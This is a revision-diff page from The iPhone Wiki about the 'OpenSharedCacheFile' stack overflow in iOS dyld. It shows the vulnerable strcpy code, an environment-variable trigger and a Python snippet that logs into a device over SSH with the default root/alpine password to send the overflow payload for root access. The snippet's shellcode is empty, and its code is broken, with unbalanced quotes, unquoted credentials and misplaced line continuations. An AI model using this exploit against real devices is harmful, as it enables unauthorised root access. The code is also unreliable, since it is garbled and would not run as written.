Difference between revisions of "OpenSharedCacheFile"

From The iPhone Wiki
Jump to: navigation, search
(Exploiting it)
Line 23: Line 23:
 
junk = "A" * 1024
 
junk = "A" * 1024
 
shellcode = ""
 
shellcode = ""
payload = DYLD_SHARED_CACHE_DIR = junk+shellcode \
+
payload = "DYLD_SHARED_CACHE_DIR"
  +
actual = payload+junk+shellcode \
cmd = DYLD_SHARED_REGION = private /bin/launchctl
 
  +
cmd = "DYLD_SHARED_REGION = "private /bin/launchctl"
 
ssh = paramiko.SSHClient()
 
ssh = paramiko.SSHClient()
 
server = "" #whatever IP
 
server = "" #whatever IP
 
ssh.connect(server, username=root, password=alpine)
 
ssh.connect(server, username=root, password=alpine)
ssh.exec_command(payload)
+
ssh.exec_command(actual)
 
ssh.exec_command(cmd)
 
ssh.exec_command(cmd)
 
 

Revision as of 19:10, 24 March 2015

The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack overflow.

Opensharedcachefile() function

int openSharedCacheFile()
{
  char path[1024];
  strcpy(path, sSharedCacheDir);
  strcat(path, "/");
  strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
  return ::open(path, O_RDONLY);
}

Triggering the vuln

To trigger it, run the following

DYLD_SHARED_CACHE_DIR = "A" * 2000 \
DYLD_SHARED_REGION = private /bin/launchctl

This will overflow the PC register making it a stack overflow.

Exploiting it

Since this bug can takeover the PC register, you first need to know where the bug starts for now lets say it crashes after 1024 A's, so your payload to get root would be

 junk = "A" * 1024 
 shellcode = ""
 payload = "DYLD_SHARED_CACHE_DIR" 
 actual  = payload+junk+shellcode \
 cmd = "DYLD_SHARED_REGION = "private /bin/launchctl"             
 ssh = paramiko.SSHClient()
 server = "" #whatever IP 
 ssh.connect(server, username=root, password=alpine)
 ssh.exec_command(actual)
 ssh.exec_command(cmd)
 
Apple-logo.png This article is a "stub", an incomplete page. Please add more content to this article and remove this tag.